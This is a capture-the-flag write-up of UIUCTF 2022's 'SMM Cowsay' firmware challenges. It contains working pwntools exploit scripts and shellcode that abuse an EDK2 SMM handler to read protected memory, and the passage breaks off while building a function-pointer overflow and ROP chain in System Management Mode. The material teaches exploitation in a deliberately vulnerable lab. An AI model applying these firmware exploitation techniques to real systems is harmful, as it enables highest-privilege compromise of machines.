Jump to: SMM Cowsay 1, SMM Cowsay 2, SMM Cowsay 3.
There was a pretty interesting “systems” category in UIUCTF 2022. In this category, three challenges of increasing difficulty called “SMM Cowsay” caught my eye. Unfortunately, I wasn’t able to solve them before the end of the CTF, but I found them so interesting that I kept going at them after the CTF, and ended up solving all three after studying them enough time.
Huge shout out to the author of these awesome challenges: YiFei Zhu, who was also so kind to award me the small bounty of $50 posted on the first blood for SMM Cowsay 3, which had remained unsolved after the CTF ended. All the challenge files should still be up in the archived UIUCTF 2022 website.
Background on System Management Mode
System Management Mode is documented in Intel SDM, Volume 3C, Chapter 30. It is the operating mode with highest privilege, and sometimes referred to as “ring -2”. This mode has higher privilege than an OS/kernel (ring 0) and even an hypervisor (ring -1). It can only be entered through a System Management Interrupt (SMI), it has a separate address space completely invisible to other operating modes, and full access to all physical memory, MSRs, control registers etc.
A special region of physical memory called SMRAM is the home of the SMI handler code and also contains a save state area where the CPU state (most importantly the values of all registers) is saved to and restored from when entering/exiting SMM.
Upon receing an SMI and entering SMM the SMI handler is executed. It initially
runs code in a weird real-mode-on-steroids operating mode, but can switch to
32-bit protected mode, enable paging (and PAE), and even switch to 64-bit long
mode (and use 5-level paging). After doing what’s needed, the SMI handler can
exit SMM with the RSM
instruction, which restores the CPU state
from the save state area in SMRAM.
SMIs can be triggered by software using IO port 0xB2
, and this functionality
can be used to implement some controlled mechanism of communication between SMM
and non-SMM code.
This is more or less enough beckground on SMM to understand what’s going on, and I will explain the rest along the way. In any case, you can always check the manuals I link. Now let’s get into the challenges!
SMM Cowsay 1
Full exploit: expl_smm_cowasy_1.py
The challenge description states:
One of our engineers thought it would be a good idea to write Cowsay inside SMM. Then someone outside read out the trade secret (a.k.a. flag) stored at physical address 0x44440000, and since it could only be read from SMM, that can only mean one thing: it… was a horrible idea.
The goal of the challenge seems simple enough: read the flag which is at
physical address 0x44440000
somehow.
The files we are given contain:
- The built challenge binaries together with a
qemu-system-x86_64
binary and a startup script that supplies the needed arguments to run the challenge locally. - Thee source code of the challenge as a series of patches to EDK2
(the de-facto standard UEFI implementation) and QEMU, along with a
Dockerfile
to apply them and build everything. - EDK2 build artifacts (i.e. binaries with useful debug symbols) of the build done for the challenge running remotely.
Running the challenge, we are greeted with the following message:
UEFI Interactive Shell v2.2
EDK II
UEFI v2.70 (EDK II, 0x00010000)
Shell> binexec
____________________________________________________________________
/ Welcome to binexec! \
| Type some shellcode in hex and I'll run it! |
| |
| Type the word 'done' on a seperate line and press enter to execute |
\ Type 'exit' on a seperate line and press enter to quit the program /
--------------------------------------------------------------------
\ ^__^
\ (oo)\_______
(__)\ )\/\
||----w |
|| ||
Address of SystemTable: 0x00000000069EE018
Address where I'm gonna run your code: 0x000000000517D100
What are we dealing with?
EDK2 patches
The EDK2 patch 0003-SmmCowsay-Vulnerable-Cowsay.patch
implements a UEFI SMM
driver called SmmCowsay.efi
: this driver will run in SMM, and registers an
handler (through the SmiHandlerRegister
function)
to be executed in SMM that prints text much like the cowsay Linux
command does:
Status = gSmst->SmiHandlerRegister (
SmmCowsayHandler,
&gEfiSmmCowsayCommunicationGuid,
&DispatchHandle
);
When a SMI happens, the SMI handler registered by EDK2 goes through a linked list of registered handlers and chooses the appropriate one to run.
The next patch 0004-Add-UEFI-Binexec.patch
implements a normal UEFI driver
called Binexec.efi
which will interact both with us (through console
input/output) and with the SmmCowsay.efi
driver to print the greeting banner
we see above when running challenge.
In order to communicate with the SmmCowsay.efi
driver, Binexec.efi
sends a
“message” through
the ->Communicate()
method provided by
the EFI_SMM_COMMUNICATION_PROTOCOL
struct:
mSmmCommunication->Communicate(
mSmmCommunication, // "THIS" pointer
Buffer, // Pointer to message of type EFI_SMM_COMMUNICATE_HEADER
NULL
);
This function copies the message in a global variable and triggers a software SMI to handle it. The message includes the GUID of the SMM handler we want to communicate with, which is searched for in the linked list of registered handlers when entering SMM.
The Binexec.efi
driver will simply run in a loop asking us for some code in
hexadecimal form, copying it into an RWX memory area, and then jumping into it
(saving/restoring registers with an assembly wrapper). This means that we have
the ability to run arbitrary code inside an UEFI driver, which runs in
Supervisor Mode (a.k.a. ring 0).
QEMU patch
The QEMU patch implements a custom MMIO device that simply reads a region4
file on the host machine and creates an MMIO memory region starting at physical
address 0x44440000
of size 0x1000
holding the content of this file. This
means that accessing physical memory at address 0x44440000
will invoke the
QEMU device read/write operations (MemoryRegionOps
), which will decide how to
handle the memory read/write.
The read operation handler (uiuctfmmio_region4_read_with_attrs()
) performs a
check ensuring that the read has
the .secure
flag set in the MemTxAttrs
structure passed
to the function, meaning that the read was issued from SMM. If this is not the
case, a fake flag is returned instead:
static MemTxResult uiuctfmmio_region4_read_with_attrs(
void *opaque, hwaddr addr, uint64_t *val, unsigned size, MemTxAttrs attrs)
{
if (!attrs.secure)
uiuctfmmio_do_read(addr, val, size, nice_try_msg, nice_try_len);
else
uiuctfmmio_do_read(addr, val, size, region4_msg, region4_len);
return MEMTX_OK;
}
EFI System Table
We are also given the address of a SystemTable
and the address where our
shellcode will copied (and ran). The UEFI Specification, on which I
probably spent more time than needed, contains all the information we need to
understand what this is about.
This SystemTable
is the EFI System Table, which is a
strucure containing all the information needed to do literally anything in an
UEFI driver. It holds a bunch of pointers to other structures, which in term
hold another bunch of pointers to API methods, configuration variables, and so
on.
What we are interested in for now is the BootServices
field of the EFI System
Table, which holds a pointer to the EFI Boot Services Table (see chapter 4.4
of the UEFI Spec v2.9): another table holding a bunch of useful
function pointers for different UEFI APIs.
Let’s run some UEFI shellcode
Ok, technically speaking it’s not shellcode if it doesn’t spawn a shell… but
bear with me on the terminology here :’). We can test the functionality of the
Binexec
driver by assembling and running a simple mov eax, 0xdeadbeef
. I am
using pwntools to quickly assemble the code from a shell.
$ pwn asm -c amd64 'mov eax, 0xdeadbeef'
b8efbeadde
----- snip -----
b8efbeadde
done
Running...
RAX: 0x00000000DEADBEEF RBX: 0x00000000069EE018 RCX: 0x0000000000000000
RDX: 0x000000000517CA1C RSI: 0x000000000517D100 RDI: 0x0000000000000005
RBP: 0x000000000000000F R08: 0x0000000000000001 R09: 0x000000000517CA2C
R10: 0x0000000000000000 R11: 0x000000000517BFA6 R12: 0x0000000005508998
R13: 0x0000000000000000 R14: 0x0000000006F9C420 R15: 0x0000000006F9C428
Done! Type more code
The driver works as intended and we also get a nice register dump after the shellcode finishes execution… well easy! Let’s try to read the flag into a register then:
$ pwn asm -c amd64 'mov rax, qword ptr [0x44440000]; mov rbx, qword ptr [0x44440008]'
488b042500004444488b1c2508004444
----- snip -----
488b042500004444488b1c2508004444
done
Running...
RAX: 0x6E7B667463756975 RBX: 0x2179727420656369 RCX: 0x0000000000000000
...
----- snip -----
$ python3
>>> (0x6E7B667463756975).to_bytes(8, "little")
b'uiuctf{n'
>>> (0x2179727420656369).to_bytes(8, "little")
b'ice try!'
Ok, the QEMU patch works as expected: the MMIO driver saw that we are not
reading memory from System Management Mode and gave us the fake flag. Even
though we do have access to physical memory, we still cannot read the flag by
running code in the Binexec.efi
driver. We need to read it from System
Management Mode.
The vulnerability
Looking at the source code in the patch implementing Binexec.efi
, we can see
how the communication with SmmCowsay.efi
works in order to print the greeting
banner:
VOID
Cowsay (
IN CONST CHAR16 *Message
)
{
EFI_SMM_COMMUNICATE_HEADER *Buffer;
Buffer = AllocateRuntimeZeroPool(sizeof(*Buffer) + sizeof(CHAR16 *));
if (!Buffer)
return;
Buffer->HeaderGuid = gEfiSmmCowsayCommunicationGuid;
Buffer->MessageLength = sizeof(CHAR16 *);
*(CONST CHAR16 **)&Buffer->Data = Message;
mSmmCommunication->Communicate(
mSmmCommunication,
Buffer,
NULL
);
FreePool(Buffer);
}
As already said above, normal UEFI drivers can communicate through this
“SmmCommunication” protocol with SMM UEFI drivers that have an appropriate
handler registered, and data is passed through a pointer to a
EFI_SMM_COMMUNICATE_HEADER
structure:
typedef struct {
EFI_GUID HeaderGuid;
UINTN MessageLength;
UINT8 Data[ANYSIZE_ARRAY];
} EFI_SMM_COMMUNICATE_HEADER;
This simple structure should contain the GUID of the SMM driver we want to
communicate with (in this case the GUID registered by SmmCowsay
), a message
length, and a flexible array member of MessageLength
bytes containing the
actual message.
The imporatant thing to notice here is this line:
*(CONST CHAR16 **)&Buffer->Data = Message;
In this case, the message being sent is simply a pointer, which is copied into
the ->Data
array member as is. In other words, Binexec.efi
sends a pointer
to the string to print to SmmCowsay.efi
through
mSmmCommunication->Communicate
. If we take a look at SmmCowsay.efi
handles
the pointer, we can see that it isn’t treated in any special way. It is simply
passed as is to the printing function:
EFI_STATUS
EFIAPI
SmmCowsayHandler (
IN EFI_HANDLE DispatchHandle,
IN CONST VOID *Context OPTIONAL,
IN OUT VOID *CommBuffer OPTIONAL,
IN OUT UINTN *CommBufferSize OPTIONAL
)
{
DEBUG ((DEBUG_INFO, "SmmCowsay SmmCowsayHandler Enter\n"));
if (!CommBuffer || !CommBufferSize || *CommBufferSize < sizeof(CHAR16 *))
return EFI_SUCCESS;
Cowsay(*(CONST CHAR16 **)CommBuffer); // <== pointer passed *as is* here
DEBUG ((DEBUG_INFO, "SmmCowsay SmmCowsayHandler Exit\n"));
return EFI_SUCCESS;
}
This means that we can pass an arbitrary pointer to the SmmCowsay
driver, and
it will happily read memory at the given address for us, displaying it on the
console as if it was a NUL-terminated CHAR16
string. If we build an
EFI_SMM_COMMUNICATE_HEADER
with ->Data
containing the value 0x44440000
and
pass it to the SMM driver through mSmmCommunication->Communicate
, we can get
it to print the flag for us!
But how do we get ahold of this “SmmCommunication” protocol to call its
->Communicate()
method? Taking a look at the code in Binexec.efi
,
mSmmCommunication
is simply a pointer obtained passing the right GUID to
BootServices->LocateProtocol()
, like this:
Status = gBS->LocateProtocol(
&gEfiSmmCommunicationProtocolGuid,
NULL,
(VOID **)&mSmmCommunication
);
Exploitation
All we need to do in order to get the flag is simply replicate exactly what the
Binexec
driver is doing, passing a different pointer to SmmCowsay
and let it
print the memory content to the console for us. In theory we could do everything
with a single piece of assembly, but since we have the ability to send multiple
pieces of code in a loop and observe the results, let’s split this into simpler
steps so that we can check if things are OK along the way.
Step 1: get ahold of BootServices->LocateProtocol
The LocateProtocol
function is provided in the BootServices
table (gBS
),
of which we actually have a pointer in the SystemTable
. We know the address of
SystemTable
since it is printed to the console for us, though to be pedantic
this does not really matter since it is a fixed address and there isn’t any kind
of address randomization going on.
We need to get SystemTable->BootServices->LocateProtocol
. In theory all
addresses are fixed in our working environment (both locally and remote) due to
no ASLR being applied by EDK2, so we could just get the address of any
function we need and do direct calls, but let’s do it the right way because (1)
we’ll actually learn something, (2) we’ll nonethless need it for the next
challenges and most importantly (3) I did not think about it originally and I
already have the code to do it anyway :’).
We can get LocateProtocol
pretty easily with a couple of MOV instructions. The
debug artifacts provided with the challenge files also include all the structure
definitions we need in the debug symbols, so we can check the DWARF info in
handout/edk2_artifacts/Binexec.debug
to get the offsets of the fields. I’ll
use the pahole
utility (from the dwarves
Debian package) for
this:
$ pahole -C EFI_SYSTEM_TABLE handout/edk2_artifacts/Binexec.debug
typedef struct {
EFI_TABLE_HEADER Hdr; /* 0 24 */
CHAR16 * FirmwareVendor; /* 24 8 */
UINT32 FirmwareRevision; /* 32 4 */
/* XXX 4 bytes hole, try to pack */
EFI_HANDLE ConsoleInHandle; /* 40 8 */
EFI_SIMPLE_TEXT_INPUT_PROTOCOL * ConIn; /* 48 8 */
EFI_HANDLE ConsoleOutHandle; /* 56 8 */
/* --- cacheline 1 boundary (64 bytes) --- */
EFI_SIMPLE_TEXT_OUTPUT_PROTOCOL * ConOut; /* 64 8 */
EFI_HANDLE StandardErrorHandle; /* 72 8 */
EFI_SIMPLE_TEXT_OUTPUT_PROTOCOL * StdErr; /* 80 8 */
EFI_RUNTIME_SERVICES * RuntimeServices; /* 88 8 */
EFI_BOOT_SERVICES * BootServices; /* 96 8 */
UINTN NumberOfTableEntries; /* 104 8 */
EFI_CONFIGURATION_TABLE * ConfigurationTable; /* 112 8 */
/* size: 120, cachelines: 2, members: 13 */
/* sum members: 116, holes: 1, sum holes: 4 */
/* last cacheline: 56 bytes */
} EFI_SYSTEM_TABLE;
This tells us that BootServices
is at offset 96 in SystemTable
(type
EFI_SYSTEM_TABLE
). Likewise we can look at EFI_BOOT_SERVICES
to see that
LocateProtocol
is at offset 320
in
BootServices
.
Setting things up with Python and pwtools, the code needed is as follows:
# Little hack needed to disable pwntools from taking over the terminal with
# ncurses and breaking the output if we do conn.interactive() since the remote
# program outputs \r\n for newlines.
import os
os.environ['PWNLIB_NOTERM'] = '1'
from pwn import *
context(arch='amd64')
os.chdir('handout/run')
conn = process('./run.sh')
os.chdir('../..')
conn.recvuntil(b'Address of SystemTable: ')
system_table = int(conn.recvline(), 16)
log.info('SystemTable @ 0x%x', system_table)
conn.recvline()
code = asm(f'''
mov rax, {system_table}
mov rax, qword ptr [rax + 96] /* SystemTable->BootServices */
mov rbx, qword ptr [rax + 64] /* BootServices->AllocatePool */
mov rcx, qword ptr [rax + 320] /* BootServices->LocateProtocol */
''')
conn.sendline(code.hex().encode() + b'\ndone')
conn.recvuntil(b'RBX: 0x')
AllocatePool = int(conn.recvn(16), 16) # useful for later
conn.recvuntil(b'RCX: 0x')
LocateProtocol = int(conn.recvn(16), 16)
log.success('BootServices->AllocatePool @ 0x%x', AllocatePool)
log.success('BootServices->LocateProtocol @ 0x%x', LocateProtocol)
Step 2: get ahold of mSmmCommunication to talk to SmmCowsay
In order to locate mSmmCommunication
we need to pass a pointer to the protocol
GUID to LocateProtocol
, and a pointer to the a location where the resulting
pointer should be stored. We already have a RWX area of memory available (the
one where our shellcode is written), so let’s use that. We normally wouldn’t,
but the patch 0005-PiSmmCpuDxeSmm-Open-up-all-the-page-table-access-res.patch
to EDK2 sets all entries of the page table to RWX so we’re good.
From disassembling any of the UEFI drivers, we can see that the calling convention is Microsoft x64, so arguments in RCX, RDX, R8, R9, then stack.
# Taken from EDK2 source code (or opening Binexec.efi in a disassembler)
gEfiSmmCommunicationProtocolGuid = 0x32c3c5ac65db949d4cbd9dc6c68ed8e2
code = asm(f'''
/* LocateProtocol(gEfiSmmCommunicationProtocolGuid, NULL, &protocol) */
lea rcx, qword ptr [rip + guid]
xor rdx, rdx
lea r8, qword ptr [rip + protocol]
mov rax, {LocateProtocol}
call rax
test rax, rax
jnz fail
mov rax, qword ptr [rip + protocol] /* mSmmCommunication */
mov rbx, qword ptr [rax] /* mSmmCommunication->Communicate */
ret
fail:
ud2
guid:
.octa {gEfiSmmCommunicationProtocolGuid}
protocol:
''')
conn.sendline(code.hex().encode() + b'\ndone')
conn.recvuntil(b'RAX: 0x')
mSmmCommunication = int(conn.recvn(16), 16)
conn.recvuntil(b'RBX: 0x')
Communicate = int(conn.recvn(16), 16)
log.success('mSmmCommunication @ 0x%x', mSmmCommunication)
log.success('mSmmCommunication->Communicate @ 0x%x', Communicate)
Step 3: kindly ask SmmCowsay to print the flag for us
We can now craft a message for SmmCowsay
containing a pointer to the flag and
let it print it for us by calling mSmmCommunication->Communicate
with the
right arguments. We can see the layout of EFI_SMM_COMMUNICATE_HEADER
using
pahole
again, inspecting the UEFI Specification PDF, or looking at EDK2 source
code.
# Taken from 0003-SmmCowsay-Vulnerable-Cowsay.patch
gEfiSmmCowsayCommunicationGuid = 0xf79265547535a8b54d102c839a75cf12
code = asm(f'''
/* Communicate(mSmmCommunication, &buffer, NULL) */
mov rcx, {mSmmCommunication}
lea rdx, qword ptr [rip + buffer]
xor r8, r8
mov rax, {Communicate}
call rax
test rax, rax
jnz fail
ret
fail:
ud2
buffer:
.octa {gEfiSmmCowsayCommunicationGuid} /* Buffer->HeaderGuid */
.quad 8 /* Buffer->MessageLength */
.quad 0x44440000 /* Buffer->Data */
''')
conn.sendline(code.hex().encode() + b'\ndone')
# Check output to see if things work
conn.interactive()
Wait a second though. This code does not work!
Running...
!!!! X64 Exception Type - 06(#UD - Invalid Opcode) CPU Apic ID - 00000000 !!!!
RIP - 000000000517D120, CS - 0000000000000038, RFLAGS - 0000000000000286
RAX - 800000000000000F, RCX - 00000000000000B2, RDX - 00000000000000B2
...
We hit the ud2
in the fail:
label and got a nice register dump, because
Communicate
returned 0x800000000000000F
: which according to the UEFI Spec
(Appendix D - Status Codes) means EFI_ACCESS_DENIED
.
Indeed there is a gotcha: even though the challenge author explicitly added an
EDK2 patch to mark all all memory as RWX in the SMM page table
(0005-PiSmmCpuDxeSmm-Open-up-all-the-page-table-access-res.patch
), there is
still a sanity check being performed on the SMM communication buffer,
as we can see in EDK2 source code, which errors out if the
buffer resides in untrusted or invalid memory regions (like the one used for our
shellcode). Thanks to YiFei for pointing this out since I had not actually
figured out the real reason behind the “access denied” when working on the
challenge.
In fact, looking at the code for Binexec.efi
above, in the Cowsay()
function
the EFI_SMM_COMMUNICATE_HEADER
is actually allocated using the library
function AllocateRuntimeZeroPool()
. We don’t have a nice pointer to this
function, but can allocate memory using either BootServices->AllocatePool()
or
BootServices->AllocatePages()
specifying the “type” of memory we want to
allocate. The EFI_MEMORY_TYPE
we want is
the type EfiRuntimeServicesData
, which will be
accessible from SMM.
EfiRuntimeServicesData = 6
code = asm(f'''
/* AllocatePool(EfiRuntimeServicesData, 0x1000, &buffer) */
mov rcx, {EfiRuntimeServicesData}
mov rdx, 0x1000
lea r8, qword ptr [rip + buffer]
mov rax, {AllocatePool}
call rax
test rax, rax
jnz fail
mov rax, qword ptr [rip + buffer]
ret
fail:
ud2
buffer:
''')
conn.sendline(code.hex().encode() + b'\ndone')
conn.recvuntil(b'RAX: 0x')
buffer = int(conn.recvn(16), 16)
log.success('Allocated buffer @ 0x%x', buffer)
code = asm(f'''
/* Copy data into allocated buffer */
lea rsi, qword ptr [rip + data]
mov rdi, {buffer}
mov rcx, 0x20
cld
rep movsb
/* Communicate(mSmmCommunication, buffer, NULL) */
mov rcx, {mSmmCommunication}
mov rdx, {buffer}
xor r8, r8
mov rax, {Communicate}
call rax
test rax, rax
jnz fail
ret
fail:
ud2
data:
.octa {gEfiSmmCowsayCommunicationGuid} /* Buffer->HeaderGuid */
.quad 8 /* Buffer->MessageLength */
.quad 0x44440000 /* Buffer->Data */
''')
conn.sendline(code.hex().encode())
conn.sendline(b'done')
Output:
Running...
__________________________
< uut{hnrn_eoi_nufcet3201} --------------------------
\ ^__^
\ (oo)\_______
(__)\ )\/\
||----w |
|| ||
Remember that we are dealing with UTF16 strings? The print routine in
SmmCowsay
seems to just skip half the characters for this reason. We can
simply print again passing 0x44440001
as pointer to get the second half of the
flag:
Running...
_________________________
< icfwe_igzr_sisfiin_55e8 >
-------------------------
\ ^__^
\ (oo)\_______
(__)\ )\/\
||----w |
|| ||
Reassembling it gives us: uiuctf{when_ring_zero_is_insufficient_35250e18}
.
SMM Cowsay 2
Full exploit: expl_smm_cowasy_2.py
We asked that engineer to fix the issue, but I think he may have left a backdoor disguised as debugging code.
We are still in the exact same environment as before, but the code for the
SmmCowsay.efi
driver was changed. Additionally, we no longer have global RWX
memory as the fifth EDK2 patch
(0005-PiSmmCpuDxeSmm-Protect-flag-addresses.patch
) now does not unlock page
table entry permissions, but instead explicitly sets the memory area containing
the flag as read-protected!
SmmSetMemoryAttributes (
0x44440000,
EFI_PAGES_TO_SIZE(1),
EFI_MEMORY_RP
);
A hint is also given in the commit message:
From: YiFei Zhu <zhuyifei@google.com>
Date: Mon, 28 Mar 2022 17:55:14 -0700
Subject: [PATCH 5/8] PiSmmCpuDxeSmm: Protect flag addresses
So attacker must disable paging or overwrite page table entries
(which would require disabling write protection in cr0... so, the
latter is redundant to former)
The first thing the EDK2 SMI handler does is set up a 4-level page table and enable 64-bit long mode, so SMM code runs in 64-bit mode with a page table.
The virtual addresses stored in the page table correspond 1:1 to physical
addresses, so the page table itself is only used as a way to manage permissions
for different memory areas (for example, page table entries for pages that do
not contain code will have the NX bit set). The flag page (0x44440000
) was
marked as “read-protect” which simply means that the corresponding page table
entry will have the present bit clear, and thus any access will result in a page
fault.
Vulnerability
Let’s look at the updated code for SmmCowsay.efi
. How is the communication
handled now? We have a new mDebugData
structure:
struct {
CHAR16 Message[200];
VOID EFIAPI (* volatile CowsayFunc)(IN CONST CHAR16 *Message, IN UINTN MessageLen);
BOOLEAN volatile Icebp;
UINT64 volatile Canary;
} mDebugData;
This structure holds a ->CowsayFunc
function pointer, which is set when the
driver is initialized:
mDebugData.CowsayFunc = Cowsay;
The SMM handler code uses the mDebugData
structure as follows upon receiving a
message:
EFI_STATUS
EFIAPI
SmmCowsayHandler (
IN EFI_HANDLE DispatchHandle,
IN CONST VOID *Context OPTIONAL,
IN OUT VOID *CommBuffer OPTIONAL,
IN OUT UINTN *CommBufferSize OPTIONAL
)
{
EFI_STATUS Status;
UINTN TempCommBufferSize;
UINT64 Canary;
DEBUG ((DEBUG_INFO, "SmmCowsay SmmCowsayHandler Enter\n"));
if (!CommBuffer || !CommBufferSize)
return EFI_SUCCESS;
TempCommBufferSize = *CommBufferSize;
// ... irrelevant code ...
Status = SmmCopyMemToSmram(mDebugData.Message, CommBuffer, TempCommBufferSize);
if (EFI_ERROR(Status))
goto out;
// ... irrelevant code ...
SetMem(mDebugData.Message, sizeof(mDebugData.Message), 0);
mDebugData.CowsayFunc(CommBuffer, TempCommBufferSize);
out:
DEBUG ((DEBUG_INFO, "SmmCowsay SmmCowsayHandler Exit\n"));
return EFI_SUCCESS;
}
The problem is clear as day:
Status = SmmCopyMemToSmram(mDebugData.Message, CommBuffer, TempCommBufferSize);
if (EFI_ERROR(Status))
goto out;
Here we have a memcpy-like function performing a copy from the ->Data
field of
the EFI_SMM_COMMUNICATE_HEADER
(passed as CommBuffer
) using the
->MessageLength
field as size (passed as CommBufferSize
). The size is
trusted and used as is, so any size above 400 will overflow the
CHAR16 Message[200]
field of mDebugData
and corrupt the CowsayFunc
function pointer, which is then called right away.
Exploitation
The situation seems simple enough: send 400 bytes of garbage followed by an
address and get RIP control inside System Management Mode. Once we have RIP
control, we can build a ROP chain to either (A) disable paging altogether and
read the flag, or (B) disable CR0.WP
(since the page table is read only) and
patch the page table entry for the flag to make it readable.
Method A was the author’s solution. In fact there already is
a nice segment descriptor for 32-bit protected mode in the SMM GDT
that we could use for the code segment (CS
register). However I went with
method (B) because it seemed more straightforward. Ok, honestly speaking I
couldn’t be bothered with figuring out how to correctly do the mode switch in
terms of x86 assembly as I had never done it before, can you blame me? :’)
There is a bit of a problem in building a ROP chain though: after the call
to
our address we lose control of the execution as we do not control the SMM stack.
It would be nice to simply overwrite the function pointer with the address of
our shellcode buffer and execute arbitrary code in SMM, but as we already saw
earlier, SMM cannot access that memory region, and this would just result in a
crash.
Finding ROP gadgets
What can we access then? It’s clear that we’ll need to ROP our way to
victory. We can modify the run.sh
script provided to run the challenge locally
in QEMU to capture EDK2 debug messages and write them to a file (we have a
handout/edk2debug.log
which was obtained in the same way from a sample run
when building the challenge, but it’s nice to have our own). Let’s add the
following arguments to the QEMU command line in handout/run/run.sh
:
-global isa-debugcon.iobase=0x402 -debugcon file:../../debug.log
Now we can run the challenge and take a look at debug.log
. Among the various
debug messages, EDK2 prints the base address and the entry point of every driver
it loads:
$ cd handout/run; ./run.sh; cd -
$ cat debug.log | grep 'SMM driver'
Loading SMM driver at 0x00007FE3000 EntryPoint=0x00007FE526B CpuIo2Smm.efi
Loading SMM driver at 0x00007FD9000 EntryPoint=0x00007FDC6E4 SmmLockBox.efi
Loading SMM driver at 0x00007FBF000 EntryPoint=0x00007FCC159 PiSmmCpuDxeSmm.efi
Loading SMM driver at 0x00007F99000 EntryPoint=0x00007F9C851 FvbServicesSmm.efi
Loading SMM driver at 0x00007F83000 EntryPoint=0x00007F8BAD0 VariableSmm.efi
Loading SMM driver at 0x00007EE7000 EntryPoint=0x00007EE99E7 SmmCowsay.efi
Loading SMM driver at 0x00007EDF000 EntryPoint=0x00007EE2684 CpuHotplugSmm.efi
Loading SMM driver at 0x00007EDD000 EntryPoint=0x00007EE2A1E SmmFaultTolerantWriteDxe.efi
Surely enough, the .text
section of all these drivers will contain code we can
execute in SMM. What ROP gadgets do we have?
Let’s use ROPGadget
to find them, using the base addresses
provided by the EDK2 debug log:
cd handout/edk2_artifacts
ROPgadget --binary CpuIo2Smm.efi --offset 0x00007FE3000 >> ../../gadgets.txt
ROPgadget --binary SmmLockBox.efi --offset 0x00007FD9000 >> ../../gadgets.txt
# ... and so on ...
Even though we have a lot of gadgets, we need multiple ones to build a useful
ROP chain. After the ret
from the first gadget, control will return back to
SmmCowsayHandler
if we do not somehow move the stack (RSP) to a controlled
memory region, so the first gadget we need is one that is able to flip the stack
where we want.
There is a very nice gadget in EDK2 code:
// MdePkg/Library/BaseLib/X64/LongJump.nasm
CetDone:
mov rbx, [rcx]
mov rsp, [rcx + 8]
mov rbp, [rcx + 0x10]
mov rdi, [rcx + 0x18]
mov rsi, [rcx + 0x20]
mov r12, [rcx + 0x28]
mov r13, [rcx + 0x30]
mov r14, [rcx + 0x38]
mov r15, [rcx + 0x40]
// ...
jmp qword [rcx + 0x48]
Our function pointer will be called with CommBuffer
as first argument (RCX),
so jumping here would load a bunch of registers including RSP directly from
data we provide. This is very nice, and indeed the author’s solution uses this
to easily flip the stack and continue the ROP chain, but ROPgadget
was not
smart enough to find it for me, and I did not notice it when skimming through
EDK2 source code while solving the challenge. Too bad! It would have
definitely saved me some time :’). I will avoid using it and show how I
originally solved the challenge to make things more interesting.
Flipping the stack to controlled memory for a ROP chain
In any case, we still have a nice trick up our sleeve. See, it’s true that we do
not control the SMM stack, but what if some of our registers got spilled on the
stack? With a gadget of the form ret 0x123
or add rsp, 0x123; ret
we would
be able to move the stack pointer forward and use anything that we control on
the SMM stack as another gadget. In order to check this we can attach a debugger
to QEMU and break at the call to mDebugData.CowsayFunc()
in
SmmCowsayHandler()
.
We can enable debugging in QEMU by simply adding -s
to the command line, and
then attach to it from GDB. I wrote a simple Python GDB plugin to load debug
symbols from the .debug
files we have to make our life easier:
import gdb
import os
class AddAllSymbols(gdb.Command):
def __init__ (self):
super (AddAllSymbols, self).__init__ ('add-all-symbols',
gdb.COMMAND_OBSCURE, gdb.COMPLETE_NONE, True)
def invoke(self, args, from_tty):
print('Adding symbols for all EFI drivers...')
with open('debug.log', 'r') as f:
for line in f:
if line.startswith('Loading SMM driver at'):
line = line.split()
base = line[4]
elif line.startswith('Loading driver at') or line.startswith('Loading PEIM at'):
line = line.split()
base = line[3]
else:
continue
path = 'handout/edk2_artifacts/' + line[-1].replace('.efi', '.debug')
if os.path.isfile(path):
gdb.execute('add-symbol-file ' + path + ' -readnow -o ' + base)
AddAllSymbols()
The first part of the exploit is the same as for SMM Cowsay 1: get ahold of
BootServices->AllocatePool
and ->LocateProtocol
, find the SmmCommunication
protocol, allocate some memory to write our message, and send it to SmmCowsay
through its SMI handler. The only thing that changes is what we are sending:
this time the ->Data
field of the EFI_SMM_COMMUNICATE_HEADER
will be filled
with a string of 400 bytes of garbage plus 8 more to overwrite the function
pointer.
We will fill all unused general purpose register with easily identifiable values so that we can see what is spilled on the stack:
# ... same code as for SMM Cowsay 1 up to the allocation of `buffer`
input('Attach GDB now and press [ENTER] to continue...')
payload = 'A'.encode('utf-16-le') * 200 + p64(0x4141414141414141)
code = asm(f'''
/* Copy data into allocated buffer */
lea rsi, qword ptr [rip + data]
mov rdi, {buffer}
mov rcx, {0x18 + len(payload)}
cld
rep movsb
/* Communicate(mSmmCommunication, buffer, NULL) */
mov rcx, {mSmmCommunication}
mov rdx, {buffer}
xor r8, r8
mov rax, {Communicate}
mov ebx, 0x0b0b0b0b
mov esi, 0x01010101
mov edi, 0x02020202
mov ebp, 0x03030303
mov r9 , 0x09090909
mov r10, 0x10101010
mov r11, 0x11111111
mov r12, 0x12121212
mov r13, 0x13131313
mov r14, 0x14141414
mov r15, 0x15151515
call rax
test rax, rax
jnz fail
ret
fail:
ud2
data:
.octa {gEfiSmmCowsayCommunicationGuid} /* Buffer->HeaderGuid */
.quad {len(payload)} /* Buffer->MessageLength */
/* payload will be appended here to serve as Buffer->Data */
''')
conn.sendline(code.hex().encode() + payload.hex().encode() + b'\ndone')
conn.interactive() # Let's see what happens
And now we can start the exploit and attach GDB using the following script:
$ cat script.gdb
target remote :1234
source gdb_plugin.py
add-all-symbols
break *(SmmCowsayHandler + 0x302)
continue
$ gdb -x script.gdb
...
Breakpoint 1, 0x0000000007ee92c5 in SmmCowsayHandler (CommBufferSize=<optimized out>, CommBuffer=0x69bb030, ...
(gdb) i r rax
rax 0x4141414141414141 4702111234474983745
(gdb) si
0x4141414141414141 in ?? ()
(gdb) x/100gx $rsp
0x7fb6a78: 0x0000000007ee92c7 0x0000000007ffa8d8
0x7fb6a88: 0x0000000007ff0bc5 0x00000000069bb030
0x7fb6a98: 0x0000000007fb6c38 0x0000000007fb6b80
...
...
...
0x7fb6b48: 0x00000000069bb018 0x0000000013131300
0x7fb6b58: 0x0000000014141414 0x0000000015151515
It seems like R13 (except the LSB), R14 and R15 somehow got spilled on the stack
at rsp + 0xe0
. After returning from the call rax
the code in
SmmCowsayHandler
does:
(gdb) x/30i SmmCowsayHandler + 0x302
0x7ee92c5 <SmmCowsayHandler+770>: call rax
0x7ee92c7 <SmmCowsayHandler+772>: test bl,bl
... a bunch of useless stuff ...
0x7ee92f7 <SmmCowsayHandler+820>: add rsp,0x40
0x7ee92fb <SmmCowsayHandler+824>: xor eax,eax
0x7ee92fd <SmmCowsayHandler+826>: pop rbx
0x7ee92fe <SmmCowsayHandler+827>: pop rsi
0x7ee92ff <SmmCowsayHandler+828>: pop rdi
0x7ee9300 <SmmCowsayHandler+829>: pop r12
0x7ee9302 <SmmCowsayHandler+831>: pop r13
